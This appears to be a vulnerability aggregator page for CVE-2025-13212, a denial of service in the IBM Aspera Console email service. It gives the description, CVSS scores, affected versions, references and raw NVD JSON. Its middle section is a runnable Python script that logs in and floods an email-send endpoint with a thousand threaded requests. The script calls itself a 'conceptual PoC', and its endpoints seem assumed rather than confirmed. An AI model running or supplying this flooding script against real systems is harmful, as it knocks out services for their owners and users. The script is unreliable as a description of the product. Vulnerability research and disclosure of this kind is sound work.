CVE-2025-13212

Description

IBM Aspera Console 3.3.0 through 3.4.8 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Aspera Console 3.3.0

IBM Aspera Console 3.3.1

IBM Aspera Console 3.3.2

IBM Aspera Console 3.4.0

IBM Aspera Console 3.4.1

IBM Aspera Console 3.4.2

IBM Aspera Console 3.4.3

IBM Aspera Console 3.4.4

IBM Aspera Console 3.4.5

IBM Aspera Console 3.4.6

IBM Aspera Console 3.4.7

IBM Aspera Console 3.4.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-13212 PoC - IBM Aspera Console Email Service DoS Note: This is a conceptual PoC for educational and security research purposes only. """ import requests import time import argparse from concurrent.futures import ThreadPoolExecutor, as_completed def send_email_request(session, target_url, email_params): """Send email service request to trigger DoS condition""" try: response = session.post( f"{target_url}/api/v1/email/send", json=email_params, timeout=5 ) return { 'status_code': response.status_code, 'success': response.status_code in [200, 201], 'timestamp': time.time() } except requests.exceptions.RequestException as e: return { 'error': str(e), 'timestamp': time.time() } def exploit_dos(target_url, username, password, num_requests=1000, threads=10): """ Exploit CVE-2025-13212 by sending rapid email service requests to cause denial of service due to improper interaction frequency control """ session = requests.Session() # Authentication (if required) auth_data = { 'username': username, 'password': password } try: login_response = session.post( f"{target_url}/api/v1/auth/login", json=auth_data, timeout=10 ) if login_response.status_code != 200: print(f"[-] Authentication failed: {login_response.status_code}") return False print(f"[+] Authenticated successfully") except Exception as e: print(f"[-] Login error: {e}") return False # Email service parameters email_params = { 'to': '[email protected]', 'subject': 'Test Email', 'body': 'Repeated email for DoS testing', 'priority': 'high' } print(f"[*] Starting DoS attack with {num_requests} requests using {threads} threads...") start_time = time.time() success_count = 0 error_count = 0 with ThreadPoolExecutor(max_workers=threads) as executor: futures = [ executor.submit(send_email_request, session, target_url, email_params) for _ in range(num_requests) ] for future in as_completed(futures): result = future.result() if result.get('success'): success_count += 1 else: error_count += 1 elapsed = time.time() - start_time print(f"\n[+] Attack completed in {elapsed:.2f} seconds") print(f"[+] Successful requests: {success_count}") print(f"[-] Failed/Error requests: {error_count}") print(f"[*] Request rate: {num_requests/elapsed:.2f} req/s") print(f"\n[!] If email service becomes unresponsive, vulnerability is confirmed") return True if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-13212 PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-u', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') parser.add_argument('-n', '--num', type=int, default=1000, help='Number of requests') parser.add_argument('-th', '--threads', type=int, default=10, help='Number of threads') args = parser.parse_args() exploit_dos(args.target, args.username, args.password, args.num, args.threads)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13212
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13212
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13212/
[4] VulDB https://vuldb.com/cve/CVE-2025-13212
[5] https://www.ibm.com/support/pages/node/7263486

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13212", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:54.500", "lastModified": "2026-03-17T15:49:03.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Aspera Console 3.3.0 through 3.4.8 could allow an authenticated user to cause a denial of service in the email service due to improper control of interaction frequency."}, {"lang": "es", "value": "IBM Aspera Console 3.3.0 hasta 3.4.8 podría permitir a un usuario autenticado causar una denegación de servicio en el servicio de correo electrónico debido a un control inadecuado de la frecuencia de interacción."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:aspera_console:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.4.9", "matchCriteriaId": "51419171-DDAE-4AA6-9109-0582F2133296"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263486", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}